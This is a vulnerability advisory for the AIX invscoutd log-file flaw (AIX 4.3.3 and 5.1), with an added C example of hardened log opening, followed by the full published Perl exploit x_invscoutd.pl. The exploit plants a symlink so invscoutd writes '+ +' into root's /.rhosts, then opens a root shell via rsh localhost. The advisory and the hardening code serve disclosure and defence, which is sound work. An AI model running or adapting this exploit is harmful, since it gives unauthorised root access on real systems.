CRITICAL:
Less critical

IMPACT:
Privilege escalation

WHERE:
Local system

OPERATING SYSTEM:
AIX 5.x
AIX 4.x

DESCRIPTION:
Watercloud has reported a vulnerability in AIX, which can be
exploited by malicious, local users to perform certain actions on a
system with escalated privileges.

A user invoking "invscoutd" may specify a logfile as a command line
argument. This may reportedly be exploited to create or overwrite
files with escalated privileges by supplying the path of an arbitrary
file.

The vulnerability has been reported in earlier versions of invscoutd
included in AIX 4.3.3 and AIX 5.1.

NOTE: An exploit has been published, which uses a special attack
vector to gain root privileges on an affected system.
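The weakness described above, a privileged daemon that opens whatever log path it is handed, is the pattern worth closing in any setuid or root-run program that accepts a file name from its caller. The C example below is added here for illustration; it is not code from invscoutd, from AIX, or from the advisory's authors, and it is written against POSIX rather than any AIX-specific API. `open_log_naively` shows the trusting open, `open_log_safely` the hardened form (perform the open with the invoking user's uid, never follow a symlink, then confirm via the descriptor that what was opened is a regular file the user owns), and `run_self_check` exercises both in a scratch directory under /tmp. All function names and paths are assumptions of this example.

```c
/* Hardened handling of a caller-supplied log path in a privileged daemon.
 * Added example for this advisory; not code from invscoutd or AIX. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: the path is trusted and opened with the
 * daemon's effective privileges, so a symlink redirects the write anywhere. */
int open_log_naively(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

/* Open the log as the invoking user and verify what was opened.
 * real_uid is the uid of the user who started the program (getuid()).
 * Returns a descriptor, or -1 with errno set. */
int open_log_safely(const char *path, uid_t real_uid)
{
    uid_t saved_euid = geteuid();
    struct stat before, after;
    int existed, fd, err;

    /* Act as the user while touching the path, so directory and file
     * permission checks apply to the user rather than to root. */
    if (seteuid(real_uid) != 0)
        return -1;

    existed = (lstat(path, &before) == 0);
    if (!existed && errno != ENOENT) {
        err = errno; fd = -1;
    } else if (existed && S_ISLNK(before.st_mode)) {
        err = ELOOP; fd = -1;                 /* never follow a symlink for a log */
    } else if (existed) {
        fd = open(path, O_WRONLY | O_APPEND);
        err = errno;
    } else {
        /* O_EXCL makes creation fail if a link appeared since lstat(). */
        fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_APPEND, 0644);
        err = errno;
    }

    if (seteuid(saved_euid) != 0) {           /* privileges must be restorable */
        if (fd >= 0) close(fd);
        return -1;
    }
    if (fd < 0) { errno = err; return -1; }

    /* Judge the object actually opened, through the descriptor, not the path. */
    if (fstat(fd, &after) != 0) { err = errno; close(fd); errno = err; return -1; }
    if (existed && (after.st_dev != before.st_dev || after.st_ino != before.st_ino))
        goto reject;                          /* swapped between lstat() and open() */
    if (!S_ISREG(after.st_mode) || after.st_uid != real_uid || after.st_nlink != 1)
        goto reject;                          /* device/FIFO, foreign file, hard link */
    return fd;

reject:
    close(fd);
    errno = EPERM;
    return -1;
}

/* Self-check in a scratch directory (paths constructed for this example).
 * Returns 0 when every expectation holds, else the number of the failed step. */
int run_self_check(void)
{
    char dir[64], plain[96], lnk[96], target[96];
    int fd, rc = 0;

    snprintf(dir, sizeof dir, "/tmp/logchk-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) return 1;
    snprintf(plain, sizeof plain, "%s/plain.log", dir);
    snprintf(lnk, sizeof lnk, "%s/evil.log", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, lnk) != 0) rc = 2;

    if (rc == 0) {                            /* a fresh plain file is created */
        fd = open_log_safely(plain, getuid());
        if (fd < 0) rc = 3; else close(fd);
    }
    if (rc == 0) {                            /* an existing plain file is reopened */
        fd = open_log_safely(plain, getuid());
        if (fd < 0) rc = 4; else close(fd);
    }
    if (rc == 0 && open_log_safely(lnk, getuid()) != -1) rc = 5;   /* symlink refused */
    if (rc == 0) {                            /* the naive open follows the link */
        fd = open_log_naively(lnk);
        if (fd < 0) rc = 6; else close(fd);
    }
    if (rc == 0 && open_log_safely("/dev/null", getuid()) != -1) rc = 7; /* not regular */

    unlink(plain); unlink(lnk); unlink(target); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_self_check();
    printf("self-check %s (code %d)\n", rc == 0 ? "passed" : "FAILED", rc);
    return rc;
}
```

The lstat/open/fstat sequence with the dev/ino comparison is the portable form of the check; on systems that provide `O_NOFOLLOW`, passing it to `open()` refuses the symlink atomically and removes the need for the preliminary `lstat()`. The ownership and `st_nlink` tests are deliberately conservative: a daemon that only ever needs to append to its own log can afford to refuse anything it did not create for the user who invoked it.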

SOLUTION:
Grant only trusted users access to affected systems.

Make sure that the latest version of invscoutd is used.

PROVIDED AND/OR DISCOVERED BY:
Watercloud, XFOCUS Team.

ORIGINAL ADVISORY:
http://www.xfocus.org/exploits/200403/31.html

Create: 2004-03-24
Update: 2004-03-25
Platform: Unix
Size: 1035 Bytes
MD5: 684a30bff440f398eda31f03d373c1d2

#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!

$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;

print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;

symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";

system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";

sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF